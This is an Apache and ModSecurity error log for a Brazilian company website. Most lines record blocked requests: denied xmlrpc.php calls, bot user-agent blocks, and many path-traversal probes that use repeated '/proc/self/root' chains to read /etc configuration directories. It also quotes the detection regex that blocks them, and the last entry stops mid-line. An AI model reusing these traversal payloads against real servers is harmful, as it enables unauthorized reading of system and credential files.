[Wed Mar 18 13:38:15.079004 2026] [access_compat:error] [pid 17887:tid 140411607643904] [client 51.210.108.69:46155] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 13:38:17.218979 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:47860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrU-UzinOy1jxa1j4c0gQAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:38:18.485532 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:39432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrU-sdf6f5d65gmYZTyVwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 13:38:18.993937 2026] [mime_magic:error] [pid 17653:tid 140411683178240] (70014)End of file found: [client 74.7.243.128:51402] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet
[Wed Mar 18 13:38:45.842590 2026] [access_compat:error] [pid 15826:tid 140411641214720] [client 195.123.216.134:57018] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 13:38:57.009465 2026] [access_compat:error] [pid 31803:tid 140411607643904] [client 181.214.165.7:12045] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 13:38:58.891265 2026] [access_compat:error] [pid 11816:tid 140411565680384] [client 173.244.33.6:53693] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 13:39:08.809695 2026] [access_compat:error] [pid 31803:tid 140411624429312] [client 149.22.87.133:33305] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 13:39:12.759794 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.244.43:57366] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrVMOyqAr6etmhZHNrkPgAAAFE"]
[Wed Mar 18 13:39:13.882188 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.228.61:58904] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrVMfu8EFLIOrSqIpsf9gAAAkM"]
[Wed Mar 18 13:39:29.778791 2026] [mime_magic:error] [pid 29882:tid 140411540502272] (70014)End of file found: [client 57.141.18.12:45214] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:39:31.984031 2026] [access_compat:error] [pid 31803:tid 140411624429312] [client 45.84.107.97:17833] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 13:39:45.911120 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:59566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrVUeoXxyEfFpUF8f-MrgAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:39:48.271456 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.243.128:38818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrVVAbLMZ6AikZjR9XdYQAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:39:50.633143 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:35182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrVVta6ubjKNq_cu4a7hQAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:39:52.104677 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:35186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrVWAkwaGbbGflqUZAuYQAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:39:53.390346 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:35194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrVWSmAPhZkrhU8w4mLIQAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:41:01.848524 2026] [mime_magic:error] [pid 15826:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:7169] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:41:04.023940 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.241.31:43562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrVoAbLMZ6AikZjR9XdsQAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:41:42.089852 2026] [mime_magic:error] [pid 31803:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:46371] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:41:58.984950 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:36948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrV1uw_le52K8_3pV37vQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:42:01.534787 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:38808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrV2SmAPhZkrhU8w4mLbgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:42:02.916807 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:38812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrV2kzinOy1jxa1j4c1cgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:42:04.235221 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:38814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrV3Na6ubjKNq_cu4a7_AAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:42:17.156188 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:43064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrV6da6ubjKNq_cu4a8FwAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:43:03.753069 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:38828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrWF9a6ubjKNq_cu4a8TAAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 13:43:34.386856 2026] [mime_magic:error] [pid 14269:tid 140411733534464] (70014)End of file found: [client 57.141.18.13:52708] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:44:12.334802 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:50616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrWXPu8EFLIOrSqIpsgwwAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:44:12.888973 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.244.43:44532] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrWXCmAPhZkrhU8w4mL0gAAAIM"]
[Wed Mar 18 13:44:13.619063 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:32854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrWXUzinOy1jxa1j4c16gAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:44:15.964226 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:32870] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrWX9a6ubjKNq_cu4a8aQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:44:17.916710 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:32884] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrWYUzinOy1jxa1j4c17QAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:44:18.711197 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.228.61:45844] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrWYuoXxyEfFpUF8f-NVAAAAUc"]
[Wed Mar 18 13:44:27.195284 2026] [mime_magic:error] [pid 30077:tid 140411574073088] (70014)End of file found: [client 57.141.18.124:54070] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:45:19.237986 2026] [mime_magic:error] [pid 17653:tid 140411616036608] (70014)End of file found: [client 57.141.18.96:55494] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:45:58.278274 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:42806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrWxta6ubjKNq_cu4a86AAAA0I"], referer: 